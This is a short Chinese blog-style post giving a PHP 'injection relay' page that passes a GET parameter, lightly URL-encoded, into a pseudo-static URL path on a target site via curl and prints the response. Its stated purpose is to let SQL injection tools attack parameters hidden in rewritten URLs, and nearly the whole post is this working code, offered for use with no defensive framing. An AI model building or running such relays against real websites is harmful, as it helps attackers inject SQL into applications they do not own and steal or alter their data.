参考链接:http://www.bshack.net/?p=384
我比较熟悉php,就用php来写一个注入中转页面吧
set_time_limit(0);
$id=$_GET[“id”];
$id=str_replace(” “,”%20″,$id);
$id=str_replace(“=”,”%3D”,$id);
//$url =”http://localhost/test/id-$id.html”;
$url = ”http://localhost/inj/index.php/index/index/id/$id.html”;
//echo $url;
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL, ”$url”);
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch,CURLOPT_HEADER, 0);
$output = curl_exec($ch);
curl_close($ch);
print_r($output);
将这个文件保存成inj.php即可,这个文件url如下:
http://localhost/inj/inj.php